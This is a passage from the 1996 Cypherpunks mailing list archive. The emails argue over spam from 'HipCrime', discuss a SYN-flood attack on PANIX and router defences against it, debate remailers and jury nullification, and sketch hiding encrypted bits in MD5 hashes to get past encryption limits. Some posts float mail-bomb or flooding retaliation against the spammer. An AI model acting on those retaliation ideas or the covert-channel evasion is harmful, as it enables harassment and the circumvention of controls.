b.s. is more like having someone put a dead skunk in my > > mailbox, with no return address, trying to prevent me from sending > > them 100 dead skunks as a return favor. And about as welcome. > > 100 dead skunks in exchange for ONE is exactly what this discussion > is all about. You CypherWIMPS just love over-kill. ^^^^^^^^^^^ I suspect you may soon be hearing from far worse than I ... Some punks take their colors seriously. EmailRobot sent > ONE message to EACH address. Are you guys so unskilled in arithmetic > to understand the difference between 1 and 100? > > One message is NOT spam, 100 messages to a single box IS spamming. > > > > -- HTTP://www.HIPCRIME.com > The same useless and boring message posted by rote to a huge collection of addresses is spam, unless participation is voluntary and consensual, in which case it is a mailing list. :) Given that less than 1% of those spammed are likely to reply, and merely hit the delete key and curse a bit, you are hereby awarded approximately 100 dead skunks. - r.w. From rwright at adnetsol.com Fri Sep 13 00:08:25 1996 From: rwright at adnetsol.com (Ross Wright) Date: Fri, 13 Sep 1996 15:08:25 +0800 Subject: "Unwanted Mail" Message-ID: <199609130451.VAA01566@adnetsol.adnetsol.com> On Or About: 12 Sep 96 at 22:49, Rabid Wombat wrote: > > The same useless and boring message posted by rote to a huge collection of > addresses is spam, unless participation is voluntary and consensual, in > which case it is a mailing list. :) > Spam, like the definition of useless and boring, is very subjective. So, I feel that waht I am doing is useful and interesting. I am sure that HipCrime feels the same. Just keep on bitching to the list and don't call your congressman about a few unwanted e-mails. Tim May writes: >But to attempt to define "SPAM" (unless you're Armour) is dangerous. >This whole notion of "unwanted mail" is ill-defined and not something >"the law" should get involved in, in my view. (And CP technologies >certainly are consistent with this, e.g., placing the role of >screening on those who set up gates, not on tracking down True Names >for prosecution.) >In the case of actual USPS mailboxes, there are laws which prevent >others from using them (e.g., no UPS or FedEx deliveries). For sure, >dead skunks can be placed in mailboxes, or under porches, or whatever. >The law can't fix everything. Thanks, Tim. My point exactly! Ross =========== Ross Wright King Media: Bulk Sales of Software Media and Duplication Services http://www.slip.net/~cdr/kingmedia Voice: 415-206-9906 From jf_avon at citenet.net Fri Sep 13 00:08:57 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Fri, 13 Sep 1996 15:08:57 +0800 Subject: who can count? Message-ID: <9609130433.AB09422@cti02.citenet.net> -----BEGIN PGP SIGNED MESSAGE----- On 12 Sep 96 at 17:57, HipCrime wrote: > > No, this b.s. is more like having someone put a dead skunk in my > > mailbox, with no return address, trying to prevent me from sending > > them 100 dead skunks as a return favor. And about as welcome. > > 100 dead skunks in exchange for ONE is exactly what this discussion > is all about. You CypherWIMPS just love over-kill. EmailRobot sent > ONE message to EACH address. Are you guys so unskilled in > arithmetic to understand the difference between 1 and 100? > > One message is NOT spam, 100 messages to a single box IS spamming. Dear HipCrime, My e-mail address is *paid for*, I subscribe to it for my own self-interest *only*. I do send requests for junk mail from various companies that falls into my fields of interest. But take note that since *I* pay for it, I consider it as my private territory. If you want to trespass, it is up to you and for the moment, there is nothing much I can do, unfortunately. I invite you to send me as much spam as you want, as long as you send me 0.1 gram of pure, 24k gold per kilobyte of spam (rounded to the superior Kb, i.e. 1.1Kb=.2g Au) you send me, payable in gold at the rate of the next day the spam was received by me, delivered at my local mailbox within 30 days (2% monthly fees applies). As long as you send payement, your spam will be welcome. (And don't send "spoofed-gold" I've got an eye for the genuine stuff :) Of course my rates are steep and non-negotiable, but there hey, what is morally objectionable in making profit when I don't *force* anybody to accept? Regards jfa p.s. e-mail me privately for my postbox address. - -- Jean-Francois Avon, Montreal QC Canada DePompadour, Societe d'Importation Ltee Finest of Limoges porcelain and crystal JFA Technologies, R&D consultant physicists and engineers, LabView programing PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQEVAgUBMjh/3ciycyXFit0NAQE0eQgApAM5ESHO/rTv6CcpFCXizEI4+5WcCjWx Aq2IBAXhfHXCgfne5mo/K4U1PrlumxfxMA1NiQ0QQ7R1hgnzocF/NlnzMrX9vkVc w1NpAFr5hc2Jr5hOyBhr/tZsvYwcQXCdAqrA+Pj/qSDDPmeO8GGfoK09Xgrsvy16 zRQTGjOh/3ko4vTGuOMCiLSPJ4vLqFfAcvF6arJ2cEBXl7opoVFVGmvIugcosTN7 gZ97lWrJiEbc/HnHT5dkgTXpqDZQkC/PLz7EmXIYdf65zCJ1G3DRYgYpXQXd3V+a nXyc3i2TDW5/tlnk6SLZvwaApzwAMtn5ZHNgBlgCIQHootcIf+Zulw== =+bxp -----END PGP SIGNATURE----- From mcw at hpato.aus.hp.com Fri Sep 13 00:21:59 1996 From: mcw at hpato.aus.hp.com (M C Wong) Date: Fri, 13 Sep 1996 15:21:59 +0800 Subject: PANIX.COM down: denial of service attack In-Reply-To: <199609130408.AAA09629@jekyll.piermont.com> Message-ID: <199609130416.AA198858212@relay.hp.com> > M C Wong writes: > > > For those who are IP hackers, the problem is that we're > > > being flooded with SYNs from random IP addresses on > > > our smtp ports. We are getting on average 150 packets > > ^^^^ > > > > Can't access to this port be guarded against by a filtering > > router which is configured to accept *only* a number of > > trusted MX hosts ? > Sure -- if you only want to accept mail from fifteen machines on > earth. If on the other hand your users might get mail from anywhere on > earth, your mail ports have to be open to connections from anywhere. No, I am saying that we use MX field in DNS to specify our MX hosts, so other hosts from anywhere else will timeout connecting to the target smtp while trying to deliver mails directly to it, and hence will have to send the message to next best MX host instead, and the firewall is configured to permit access *only* from those MX hosts. The problem here becomes how one can protect all those MX hosts instead. DNS cannot hide those info properly I believe since it will mean it also hides info of mail delivery to the host, a D.O.S in itself,. 8-(( > .pm From zachb at netcom.com Fri Sep 13 00:24:49 1996 From: zachb at netcom.com (Z.B.) Date: Fri, 13 Sep 1996 15:24:49 +0800 Subject: Fed appellate judge remarks re anonymity, free speech on the net In-Reply-To: <2.2.32.19960913004019.006df548@pop.ricochet.net> Message-ID: On Thu, 12 Sep 1996, Greg Broiles wrote: > > (Also in today's news, the 9th Circuit upheld a CA statute forbidding sales > of material considered "harmful to minors" from vending machines.) > Oh, well, that just narrows it down really well. Might as well just take out all of the machines now, because you could make a case that just about ANYTHING out of a vending machine is "harmful to minors". Soda machines? Caffeine and sugar. Snack machines? Sugar again. Those machines in supermarkets that give little toys? A child *could* swallow one and choke. And on and on and on. Even if this statute is meant only to apply to cigarette machines, which would seem to be the case given all of the anti-cig stuff going on now, what good will it do? I have never (in 20 years living in CA) seen a cigarette machine out where a child could get something from it, only inside a pool hall or another adult-only establishment. Another one of those bills to "selectively enforce" things, perhaps? Sheesh. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From perry at piermont.com Fri Sep 13 00:36:10 1996 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 13 Sep 1996 15:36:10 +0800 Subject: PANIX.COM down: denial of service attack In-Reply-To: <199609130416.AA198858212@relay.hp.com> Message-ID: <199609130421.AAA09822@jekyll.piermont.com> M C Wong writes: > > > Can't access to this port be guarded against by a filtering > > > router which is configured to accept *only* a number of > > > trusted MX hosts ? > > > Sure -- if you only want to accept mail from fifteen machines on > > earth. If on the other hand your users might get mail from anywhere on > > earth, your mail ports have to be open to connections from anywhere. > > No, I am saying that we use MX field in DNS to specify our MX hosts, so > other hosts from anywhere else will timeout connecting to the target smtp > while trying to deliver mails directly to it, and hence will have to send > the message to next best MX host instead, and the firewall is configured > to permit access *only* from those MX hosts. > > The problem here becomes how one can protect all those MX hosts instead. You can't. All you are doing is moving the problem. I don't see how that could be of any possible interest. The machines in question are already the MX hosts for the zone. Perry From wombat at mcfeely.bsfs.org Fri Sep 13 00:36:27 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Fri, 13 Sep 1996 15:36:27 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] In-Reply-To: <3238BD18.64F8@precipice.v-site.net> Message-ID: OTOH, there's always altavista. - r.w. On Thu, 12 Sep 1996, HipCrime wrote: > > I'd view "comment" as expressing an opinion. If I put an "email to:" > > tag on a web site, I'm inviting "comment" on the information I've > > placed in public view > > A message sent to a MAILTO button on a WebPage, which contains the URL > of another WebPage is EXACTLY on-topic. It's my belief that any active > "webmistress" would be interested in what other sites have to offer. > > -- HTTP://www.HIPCRIME.com > From tcmay at got.net Fri Sep 13 00:57:43 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 13 Sep 1996 15:57:43 +0800 Subject: "Remailers can't afford to be choosy" Message-ID: I've picked the provocative title "Remailers can't afford to be choosy" so as to make an important point about remailers. First, a few responses to Rabid Wombat: At 3:26 AM 9/13/96, Rabid Wombat wrote: >Hormel, isn't it? Anyway, my point is that the law should not be involved >in it, but that it is going to be sucked in whether we like it or not if >social pressure is ineffective. What is, and is not "spam" has been Social pressure rarely works, of course. Canker and Sleazewell used the negative publicity about their spamming to sell more books. And the law rarely works, either. What _does_ work, throughout history, is technology. Locks on doors work where all the social pressure and all the legal measures fail. The SPAM situation has various parallels (and differences, of course). The point being argued in this latest thread, that "inappropriate" responses to a "mail me" button on a Web page have these parallels: * a contest operator announces a drawing based on forms filled out and deposited in a box, but neglects to check against multiple entries. One person "games against" the rules and submits 25,000 entries. The contest operator claims that this is fraud, or "contest SPAM," to coin a phrase. He splutters, "It's not fair! I assumed only one entry per person, even though I took no steps to ensure this. I want a law!" (Astute readers will recognize this situation from an early Heinlein novel.) * a radio station invites listeners to call in, then complains that one person is "calling too much." (A common situation with talk radio, and one best handled by screening callers. Even so, some of the same callers get through by using various disguised voices, etc. As with the contest situation, a problem best solved by the party involved, not the legal system.) * in general, any of several "over use of free or public resources." The bum who sits in a park, the kid who hangs out at the mall for several hours a day, the family who park themselves on the best fishing spot every weekend, etc. Again, these are not situations where I think either "social pressure" or "the law" works very well. Better solutions are to find ways to meter scarce resources. ... >We're therefore stuck - as a community, we cannot stop what many people >consider to be undesirable, as we cannot even define it, and the unwashed >masses will set governance upon us for our "own good." No, it is not hopeless. "Congestion pricing" is the operative phrase. Web sites that are too crowded can add capacity and increase advertising rates, or can charge admission, or the like. Remailers can (and will, sooner rather than later) charge "digital postage" for the service they are performing. (If nobody will pay, and the remailer network fizzles out, then clearly there was not an overall market, was there? I doubt that this is so, though at this early stage there is a lot of experimentation, subsidized sites, etc. Not an argument for laws, though.) >The ability to be anonymous on the 'net is generally a good >thing. It has allowed people access to information that might have >otherwise been denied them. It is an important freedom, and one that is >already in danger of being taken away through legislation (Georgia on my >mind ...). Abuse of this freedom by someone for purely commercial >purposes is certainly not going to help matters. _Lots_ of uses of remailers are "not going to help matters." So? Use of remailers to post the Homulka-Teale stuff was not well-received, use of remailers to post child porn is not well-received, use of remailers to bypass national security laws is not well-received. So? Remailer operators really, really, really have to get out of the business of looking at "what customers are using the remailers for" and then deciding to block senders, recipients, etc. based on what they see. I don't mean to minimize their concerns about illegal material being sent, about spamming, about insults and libelous stuff, etc., but it's important for all remailers to carefully think back to Chaumian mixes and what they mean. For one thing, there is no screening, no approval of content, etc. There might be digital postage, of course. And chaining, preferably. And encryption all the way through. Reread Chaum's original 1981 paper, the inspiration for our earliest thoughts about remailers. "Remailers can't afford to be choosy" >Note the earlier comment about someone being unhappy about their >"remailer-baby" being used for such a purpose - someone running a >remailer is generally doing so as a service, and is generally not >compensated for the equipment, time, energy, and aggravation. A lot of >remailers have shut down recently. Is this helping the cause of privacy >and free speech? Yes, actually. The shut-down of nonanonymous remailers is a good thing, ultimately. And the lessons of what happens when remailers become too well known (and hence nice fat targets for spammers, denial of service attackers, Churches, etc.) is also clear. By the way, today's remailers appear to be primarily _experiments_ or _casual services_, not altruistic services for some nebulous idea of "free speech." (Besides, if it's illegal for "spammers" to use remailers, so much for "free speech.") Digital postage is the ideal way to reduce the amount of "spam" flowing through a remailer site. The issue of "unwanted mail" is a more complicated issue, given our current "free to deliver" set up, and not one which directly involves the issue of remailers (except insofar as making it harder to track spammers down, but this is just the standard case with all crimes/etc. committed with remailers, and is a separable issue). >providor of web content as a courtesy to their readers. Why does it fall >to them to provide a completely off-topic forum for someone else's views? >How are they any different from members of a public mailing list? Must >the members of c'punks and toad.com accept all unpaid advertising in the >name of free speech? Absent rules or arrangements by the owners of the toad.com site, there is no legal recourse. And given the international nature of lists on the Internet, exactly which country's laws would be the operative ones? Would Poland request the extradition of a Brazilian who "spammed" via the Cypherpunks list, currently operating out of California? The mind boggles. Look to technoological/economic solutions as a first resort, not a last resort. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From unicorn at schloss.li Fri Sep 13 01:06:17 1996 From: unicorn at schloss.li (Black Unicorn) Date: Fri, 13 Sep 1996 16:06:17 +0800 Subject: Sen. Burns' statement on postponement of Crypto vote today. In-Reply-To: <199609122356.TAA01893@nrk.com> Message-ID: On Thu, 12 Sep 1996, David Lesher wrote: > Robert Hettinga sez: > > From: somebody > > Administration in next two > > weeks will unveil its "new and improved" encryption policy, which will likely > > offer a shift in licensing to Commerce Dept., and gradual easing of > > exportable strength, in exchange for industry-funded key escrow management > > demo projects. > > I hear that the Feebs and DOJ are upset that they do not have enough > pull in NSA/Commerce decisions; and wants to get in the middle of > process. Industry is screaming over that. Hogwash. James McAdams III in the Office of Intelligence Policy and Review is arguably the most infuential intelligence policy official in the country. DoJ has plenty of say and to my knowledge they are not at all bitching. > > Of course, Feebs et.al have not legal standing in ITAR decisons, but > that's not stopped 'em before.... > > > > -- > A host is a host from coast to coast.................wb8foz at nrk.com > & no one will talk to a host that's close........[v].(301) 56-LINUX > Unless the host (that isn't close).........................pob 1433 > is busy, hung or dead....................................20915-1433 > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From bdavis at thepoint.net Fri Sep 13 01:07:20 1996 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 13 Sep 1996 16:07:20 +0800 Subject: jury nullification/selection In-Reply-To: <2.2.32.19960912075929.00691470@pop.ricochet.net> Message-ID: On Thu, 12 Sep 1996, Greg Broiles wrote: > > Sorry if I was too terse earlier. I hadn't intended to start a big FIJA dustup. > > I think that government sleaziness is not only useful in a true > nullification argument ("he's guilty but you should acquit anyway") but Certainly, the nullification argument can be used in the "send the government a message" sense, but it is more likely to be successful IMO in a "poor, poor pitiful me" argument. > where it reflects on the credibility of testimony and the prosecution's case > in general. It's easy to imagine a prosecution which rests on the testimony > of people who lie every day (criminally involved informants, jailhouse > informants, and undercover cops) and/or real evidence which was gained > through the use of subterfuge and trickery (like wiretap/body wire > evidence). The idea is to make the government look sleazier and trickier > than the defendant(s) and the defense witnesses. If the government's > evidence ends up being tainted directly or indirectly by lying, trickery, > etc., then the defense can argue "Hey. You can't trust anyone who got up on > that stand and talked to you. And if you don't know who to trust and you > think everyone's lying, the government's got no case. And if they've got no > case, the judge will tell you that you must acquit." This happens in most criminal trials in my area to at least some extent and to an ever greater degree in drug prosecutions (more material ...). :-) > So I think that public distaste and discomfort with weirder and sleazier > tactics on the part of cops can be (and is) discussed and used and "voted You need to know who is on your jury. Many goverment employees, retirees, and housewives (who frequently populate juries) are at least as likely to not care what the cops did while looking at, say, a young black male defendant charged with distributing drugs. > on". "Not guilty" doesn't necessarily mean "innocent", sometimes it means > "The prosecution didn't have enough evidence I thought I could trust." Not Guilty *never* means innocent. It means not proven guilty beyond a reasonable doubt (or "we nullified"). > And yes, I agree that even mentioning nullification during voir dire will > probably get you kicked off of a jury; and I think that's partly because one > party or the other will be scared of nullification, and partly because the > term "jury nullification" makes people think of FIJA and associated loons. > Nobody wants a loon on the jury. (I don't think everyone who argues for > nullification is a loon, but some of them sure are - and there's no good way > to figure out whether someone's a loon or not in the middle of jury selection.) > > And I also agree that the jury selection process tends to select away from a > true cross-section of society; but the few easily available examples (big > trials like OJ or the Menendez Bros. or Wm. Kennedy Smith or whoever) are > poor examples because they're not typical. Trials where lots is at stake Especially because $$$ is available to hire jury experts, do a summary mock jury trial to test theories out, and have a shadow jury. > (death penalty or celebrity defendant or big $ civil trials) tend to have > longer processes (which weed out everyone who isn't incredibly boring) but > it's not at all uncommon to pick a jury in a morning or in a day or two. In My personal record in a federal criminal case is four hours -- from jury selection to verdict. The defendant later threatened to kill his lawyer, the probation officer, the judge and ... me. > federal court, the judge usually questions the jury instead of the attorneys > (which is faster), and may or may not ask questions that the attorneys have > suggested. Also, sometimes one side or the other will *want* especially > analytical or technical or well-trained jurors. Attorneys want to pick a > jury they can persuade, but they also want to pick a jury that can > understand their theory of the case. > > So I guess my point is that while the jury system isn't perfect, it is in > some ways a much more direct way to "vote" on how things work in the > judicial and law enforcement systems. I think it's more immediately and > directly democratic than the electoral system. All of the legal bullshit > aside, it's possible to think about trials as a way for people who have some > sort of problem (they've been injured or accused of a crime or whatever) to > tell a group of uninvolved people about the problem and ask them what the > right thing to do is. Yeah, that's really oversimplified, but I think that > what juries do is important and that what they do has a political and a > moral dimension even if attorneys aren't supposed to talk about it during > argument. Roger that. The first case I ever tried, I lost. I was very unhappy. But the victim was quite pleased. She felt that she had the opportunity to say what she had to say ... let it all out ... and everything was fine. There is some value in "reverse allocution." EBD > -- > Greg Broiles | "We pretend to be their friends, > gbroiles at netbox.com | but they fuck with our heads." > http://www.io.com/~gbroiles | > | > > From gbroiles at netbox.com Fri Sep 13 01:09:33 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Fri, 13 Sep 1996 16:09:33 +0800 Subject: Fed appellate judge remarks re anonymity, free speech on the net Message-ID: <2.2.32.19960913060631.006bf908@pop.ricochet.net> At 09:24 PM 9/12/96 -0700, zachb at netcom.com wrote: >> (Also in today's news, the 9th Circuit upheld a CA statute forbidding sales >> of material considered "harmful to minors" from vending machines.) > >Even if this statute is meant only to apply to cigarette machines, which >would seem to be the case given all of the anti-cig stuff going on now, >what good will it do? Whoops. Sorry. Wrong context. What I should have said was "the 9th Circuit upheld a CA statute forbidding sales of *printed* material considered 'harmful to minors' from unsupervised vending machines". The publication(s) at issue are those newsprint swingers' magazines (e.g., "me and my friend want to screw you and your friend. here is a picture of us naked."). (doh!) -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From jf_avon at citenet.net Fri Sep 13 01:15:46 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Fri, 13 Sep 1996 16:15:46 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] Message-ID: <9609130432.AA09422@cti02.citenet.net> On 12 Sep 96 at 20:03, Rabid Wombat replied to a spammer with an Attila the Hun (looter and plunderer) mentality: > > > However, since others may think like you, I guess I'll have to > > > add a line above my link stating that email not related to the > > > purpose of my site will be happily proof-read at the rate of > > > $200 per hour, The looter speaking here: > > How can you hope to > > enforce it? It's a joke, right? :) Maybe not, since it's on your > > sig-line. that is one of their way of seing life: as long as you have the physical means to perform an action and that nobody else can stop you, you can do it. > > A website is > > an open invitation to comment and e-mail. Again, he doesn't ask himself why the page, put into existence (most of the time by the good will of the creator and owner of the account, paying out of his own pocket from his own work) does not bear the mention: "we invite spam" > > Better password your > > site if you want to solve this problem. "Civilisation, is the transition from a public society to a society of privacy" (approximate quote from Ayn Rand). We have laws that hope to accomplish that, i.e. trying to set men free from other mens. Passwording is like putting a lock on a door: to prevent intrusion from peoples that have different values. Note that the trespassing is *always* done in favor of the looters at the expense of the producers. > > Then no-one can visit it, > > and no-one can send out a spider to get your e-mail address. > > That's what I do, send out a robot to bring back e-mail addresses. > > Of course I only send to makers of software, and my product > > applys to their world. I'm glad the tresspasser limits the field of his victims. > Comment is one thing. Mass junk mail is another. I'd view "comment" > as expressing an opinion. If I put an "email to:" tag on a web site, > I'm inviting "comment" on the information I've placed in public view > - there's reasonable expectation that the "comment" will be > pertinent, even if it is only "Your automated gif sucks." This isn't > quite the same as inviting completely irrelevent junk mail, and I > still fail to see how you make this leap of logic. He does it very simply: by blanking out the nature of his acts. Only, there is no logic in this act, only feelings. > You are on a public mailing list, aren't you? You have some degree > of expectation as to the pertinence of topics discussed on said > list, don't you? Even if it is c'punks? The same holds true for > newsgroups. The vast majority of 'net users dislike off-topic > discussion; they subscribe to mailing lists and newsgroups to > discuss topics of relevence and mutual interest. > It is highly > self-centered of you to assume the "right" to waste their time with > unwanted and completely off-topic communication. No, it is not self-centered at all, it is only done on the impulsion of the moment. If he were smart, he would realize that reputation takes years to build and seconds to destroy. > > If you don't want spam in your mail box: > > > > 1. Don't have a website or don't put your e-mail address on your > > website If you don't want to get mugged, don't walk in the street; if you don't want to get killed by a mugger, chase him and offer him you wallet, then kill yourself. I grew in an extended family where there was always money and wallets on the kitchen table. But no matter how broke one of us were, if it did not belong to him, he did not take it. It is, of course, out of respect for life (and it's economic extension, the right to property) > > 2. Don't post to newsgroups Don't exists... ( because to him, the use of force is legitimate and there is no such right as the right to live, as long as he's got stronger arms than yours) > > 3. Don't post to mailing lists Ditto > > 4. If you post do so anonymously Act covertly, Live in fear. > When you exercise your "right" to free speech to the extent that you > piss off a large segment of society, society will react by reducing > its measure of freedom of speech. I won't start a discussion here. I will simply state that words have a definite meaning and that by twisting them (I suppose innocently in your case), you give them a moral sanction. jfa Jean-Francois Avon, Montreal QC Canada "One of theses centuries, the brutes, private or public, who believe that they can rule their betters by force, will learn the lesson of what happens when brute force encounters mind and force." - Ragnar Danneskjold PGP key at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From mcw at hpato.aus.hp.com Fri Sep 13 01:16:02 1996 From: mcw at hpato.aus.hp.com (M C Wong) Date: Fri, 13 Sep 1996 16:16:02 +0800 Subject: PANIX.COM down: denial of service attack In-Reply-To: <2.2.32.19960912182630.008b6324@panix.com> Message-ID: <199609130334.AA161125684@relay.hp.com> > Here are the gory details from the first MOTD last Saturday: > The attacker is forging random source addresses on his > packets, so there is no way to find his/her location. There > is also no way to screen out those packets with a simple > router filter. > This is probably the most deadly type of denial-of-service > attack possible. There is no easy or quick way of dealing > with it. If it continues into Saturday we will start working > on kernel modifications to try to absorb the damage > (since there's absolutely no way to avoid it). This > however will not be an easy job and it could take days to > get done (and get done right). > For those who are IP hackers, the problem is that we're > being flooded with SYNs from random IP addresses on > our smtp ports. We are getting on average 150 packets ^^^^ Can't access to this port be guarded against by a filtering router which is configured to accept *only* a number of trusted MX hosts ? That is the target itself *never* permits any incoming traffic to smtp port *not* in the list of trusted MX hosts, which does buffering for the target ? Info on such MX hosts be hidden from secured way of DNS setup so attacker will not learn about the MX hosts easily. In case on MX host get flooded, there will be at least one backup host to take over to prevent a total D.O.S. > Since then the packet streams have hit almost all the ports for news, www, > telnet, etc. > DCF -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ M.C Wong Email: mcw at hpato.aus.hp.com Australian Telecom Operation Voice: +61 3 9210 5568 Hewlett-Packard Australia Ltd Fax: +61 3 9210 5550 P.O. Box 221, Blackburn 3130, Australia From roy at sendai.scytale.com Fri Sep 13 01:44:54 1996 From: roy at sendai.scytale.com (Roy M. Silvernail) Date: Fri, 13 Sep 1996 16:44:54 +0800 Subject: mailing lists In-Reply-To: <3238648F.207@precipice.v-site.net> Message-ID: <960913.002423.7Q6.rnr.w165w@sendai.scytale.com> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, robert at precipice.v-site.net writes: > Why not put your money where your mouth is, and bet me (any amount), > that spam WILL be socially acceptable by the year 2000. Particularly, > when the green-folks discover how many trees will be saved. It'll be > a social-mandate, NOT just a suggestion. Want to bet? Bryce had a great idea when he suggested a mail filter with a $1 ecash deposit required for first contact. It would certainly help out when people who Don't Get It start to misbehave. - -- Roy M. Silvernail [ ] roy at scytale.com PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at scytale.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjjwxBvikii9febJAQFqJgP8Dba9ElftL7FLnpBfzf4YxARw4GUiFKn0 dsXBBPzP3K/Tv1okiR2/7jPwPEaTjwZIkOt4FwjoipFdQqNG6b6D87LOWmSLxYw0 qEw91mquDFeByZewETp/lVG66Ff834crZB0/6UCG00MUip5PWt1VXOMBwjc3pjQD P+yJ+NEBlA0= =zwwH -----END PGP SIGNATURE----- From robert at precipice.V-site.net Fri Sep 13 01:46:04 1996 From: robert at precipice.V-site.net (HipCrime) Date: Fri, 13 Sep 1996 16:46:04 +0800 Subject: No Subject Message-ID: <3238FD6C.5CB7@precipice.v-site.net> Here's a collection of your various threats: > I suspect you may soon be hearing from far worse than I ... > Some punks take their colors seriously. > Congradulations. I had at first thought you were a simple fool. > Now I'm certain you're an idiot. > Sounds to me like every remailer can legally be altered to send a > small message to hipcrime every time it processes any messages. > if anyone's got a T3 handy, you could always take the direct approach. In making these threats, you've mistaken me for someone who cares. Someone who cares what you send to my box. I'm actually, and in fact, homeless in real life. Yes, both an "idiot" and a "simple fool": your compliments in my book. My only equipment is access to friends' computers, and a free dialup that the big-hearted SysOp at V-Site gives me. (By the way, you've been merciless to him). In view of this fact: Do you think that even 1,000,000 messages into my stupid electronic mailbox would matter? Some nights my worries are of a place to sleep, not how many messages will accumulate during my slumber. CypherPunks live so far from real-life, that it's impossible for them to communicate rationally. Never having any danger in their lives, they want to avoid encountering any in "cyberspace". They are trying to craft that new world according to their intellectual guidelines. Trying to make sure real-world annoyances have been removed. This is what HipCrime's real offense was: providing a piece of unexpected (ok,ok "unwanted", if you prefer) stimulus. Only a single one. A tiny-little URL, but sent without warning, anonymously, and pointing to a strange site. Since I've UNSUBSCRIBED from your CypherWimps mailing list, and still receive your messages (two copies, the one you send me, and the one you send the list), my only conclusion is that Email is your only social discourse. Take notice that after this, all future messages from y'all will feel the power of the DELETE button (unread and barely noticed). Think of how easy it is to move around in "cyberspace". Do this math: 1,000,000 messages = 1 new domain + 1 new mailbox. In this argument you win, junk Email is SPAM ... but junk SnailMail is THIN SLICES CUT FROM OUR PRECIOUS FORESTS. -- HTTP://www.HIPCRIME.com From bdavis at thepoint.net Fri Sep 13 01:49:12 1996 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 13 Sep 1996 16:49:12 +0800 Subject: Jury Nullification = Voting One's Conscience In-Reply-To: Message-ID: On Wed, 11 Sep 1996, Timothy C. May wrote: > At 9:18 PM 9/11/96, Brian Davis wrote: > >On Wed, 11 Sep 1996, jonathon wrote: > >> On Wed, 11 Sep 1996, Gary Howland wrote: > >> > >> > > But the public *is* asked to assent to those methods - your chance > >>to vote > >> > > on them is known colloquially as "jury duty". > >> But judges have said that Jury Nullification is not acceptable > >> legal practice. > > > >And other judges have said the opposite. > > And I don't think there has _ever_ been a case of a juror prosecuted/jailed > for voting his or her conscience, regardless of jury instructions. Short of > explicitly selling one's vote, or discussing the case during deliberations > with outsiders (and probably not even then), one is essentially free to > vote one's conscience (however foolishly, as the O.J. case showed). Agreed. A petit jury is when citizens have the right and power to do what they will. Juries are supposed to judge the facts and, if they don't believe a fact necessary for one side to win, then the other side wins. But that's not the end of it: Lawyers play on jurors' sympathies all the time -- spouse and kids in the front row (crying), "mentioning" a defendant's extensive medical problems, etc. The jury can accept these or not. Occasionally, a jury will buy into some of that and the judge will be so disgusted at what *he* sees as an injustice, that he will lecture the jury before dismissing them. Yes, jurors swear an oath to follow the law as the judge gives it to them, but jury nullification is well-established in Anglo-American jurisprudence. One of my local federal district judges seriously considered instructing the jury on its "right to nullify" at the close of the case. Obviously, he didn't care for that particular prosecution. It wasn't my case, so I don't know if he ultimately instructed the jury on nullification, but I know the prosecutor was running around the library, looking for ammo to use in his argument against the instruction. And yes, in an appropriate case, I can see myself asking the judge for such an instruction -- and I see myself, in effect, arguing it in closing in many more cases. > > And the principle is a good one: jurors should not have to fear prosecution > for voting their consciences, regardless of technical details imposed by a > judge. And, of course, jurors are not required to give a court their > "reasons" for voting as they do. > > Though I often condemn aspects of the American political and legal system, > it is true that an awful lot of things are done right. Perhaps, like democracy, it is the worst system possible, except for every other system man has invented. EBD > --Tim May, who served _once_ on a jury (for a speeding case) in 1973, who > was called once since then, but not actually called for a jury. (I vote > every election, I am duly registered with the DMV, so I wonder why I have > only served once in 24+ years of eligibility.) .... From jim at suite.suite.com Fri Sep 13 01:51:08 1996 From: jim at suite.suite.com (Jim Miller) Date: Fri, 13 Sep 1996 16:51:08 +0800 Subject: really undetectable crypto Message-ID: <9609130234.AA06200@suite.com> Most everybody on the list is familiar with the technique of hiding encrypted messages in the LSBs of image files. Personally, I would not use such a technique because don't I believe it's really undetectable. I assume, without proof, that the LSBs of images files have statistical properties that are sufficiently different from encrypted data that a clever person could determine whether or not an image file contained an imbedded encrypted message. Fortunately, there are other steganographic techniques that, I believe, are undetectable. The trick is to hide your encrypted bits in other encrypted bits. trick #1) Let's say you want to send a short encrypted message via a communications channel that only allows cleartext messages with optional MD5 message hashes. You can construct cleartext messages, via trial-and-error, such that the first 4 or 8 bits (or more, if you have the time) of the MD5 hash match the first 4 or 8 bits of your encrypted message. You can pre-compute all the required cleartext messages in advance, and then send them one after another. The recipient of the cleartext messages can reconstruct the encrypted message by gathering together the first 4 or 8 bits of each MD5 hash. Since the bits in an MD5 message hash are presumably cryptographically random, there should be no way to tell if some of the bits combine to make an encrypted message. trick #2) Let's say you are allowed to use 40 bit encryption, but nothing stronger. As in trick #1, you can pre-compute plaintext messages such that the first 4 or 8 of the bits in the 